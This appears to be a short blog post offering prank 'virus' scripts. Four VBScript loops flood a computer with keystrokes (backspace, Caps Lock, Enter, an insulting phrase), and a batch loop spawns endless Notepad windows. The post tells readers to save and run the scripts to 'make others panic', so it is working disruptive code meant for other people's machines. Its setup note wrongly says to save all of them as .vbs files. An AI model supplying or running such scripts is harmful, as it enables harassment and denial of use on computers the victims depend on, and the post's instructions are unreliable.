New fun viruses...try n njoy it..make others panic a while...COZ you know the solution too
BackSpace Virus (activates backspace everytime u start typing)
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
CAPS Lock Dance Virus (Turns on ur Caps Lock)
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Enter Virus (activates Enter key everytime)
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Fool Virus
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Notepad Virus (notepad autogen)
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
note :-Copy the code of the virus you want and paste it in notepad.Save the file with any filename and extension (.vbs).Double click the saved file and watch the effect.
Remember :- These are just fun viruses.They don't affect any of your system files.
Recovery : Everything should be back to normal once you restart your system.Don't panic
0 feedbacks:
Post a Comment